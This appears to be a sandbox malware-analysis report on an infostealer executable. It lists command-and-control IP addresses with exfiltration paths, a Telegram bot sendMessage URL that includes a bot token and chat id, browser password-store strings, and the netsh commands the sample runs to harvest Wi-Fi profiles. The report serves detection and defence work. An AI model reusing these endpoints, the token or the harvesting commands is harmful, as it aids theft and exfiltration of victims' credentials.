          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113:8080/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113:8080/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113:80802(
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FD5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:80802(
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146:80
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146:80/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146:80/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.60.191.38:80
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.87.207.180:9090
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.65.63
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.65.63/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.65.63:80
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.65.63:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%74
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.65.63:80/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.65.63:80/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.73.118
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.73.118:9000
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.73.118:9000/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.73.118:9000/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.73.118:9000/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.73.118:90002(
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.110.140.182:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.96.78.224:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.42.56.128:80
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.134.71.132:8082
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.110.16:9999
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.147.179
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.147.179/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.147.179:80
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.147.179:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.147.179:80/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.147.179:80/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://101.126.19.171:443
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://138.2.92.67:443
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://154.9.207.142:443
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://44.228.161.50:443
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135/2r1j6_user%40358075_report.wsrp
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=72591
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCEA000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCEA000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 60240 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60237 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60240
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60237
          Source: unknownHTTPS traffic detected: 5.196.181.135:443 -> 192.168.2.8:60237 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:60240 version: TLS 1.2

          System Summary

          barindex
          Source: 73ybGtnYXx.exe, fz.csLong String: Length: 11394
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936ABAEE20_2_00007FF936ABAEE2
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936AA15E80_2_00007FF936AA15E8
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936AA29430_2_00007FF936AA2943
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936AB9A8A0_2_00007FF936AB9A8A
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936AB930D0_2_00007FF936AB930D
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936AA74590_2_00007FF936AA7459
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936AA6C190_2_00007FF936AA6C19
          Source: 73ybGtnYXx.exe, 00000000.00000000.843901184.000001B60DEC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSa7fafebc9f48c386e4a3247d7b5735aff07c.exed" vs 73ybGtnYXx.exe
          Source: 73ybGtnYXx.exeBinary or memory string: OriginalFilenameSa7fafebc9f48c386e4a3247d7b5735aff07c.exed" vs 73ybGtnYXx.exe
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/2@3/11
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile created: C:\Users\user\AppData\Local\ucv4nuoh0hJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeMutant created: NULL
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeMutant created: \Sessions\1\BaseNamedObjects\m01g4892qu
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
          Source: 73ybGtnYXx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 73ybGtnYXx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC91000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 73ybGtnYXx.exeVirustotal: Detection: 58%
          Source: 73ybGtnYXx.exeReversingLabs: Detection: 71%
          Source: unknownProcess created: C:\Users\user\Desktop\73ybGtnYXx.exe "C:\Users\user\Desktop\73ybGtnYXx.exe"
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
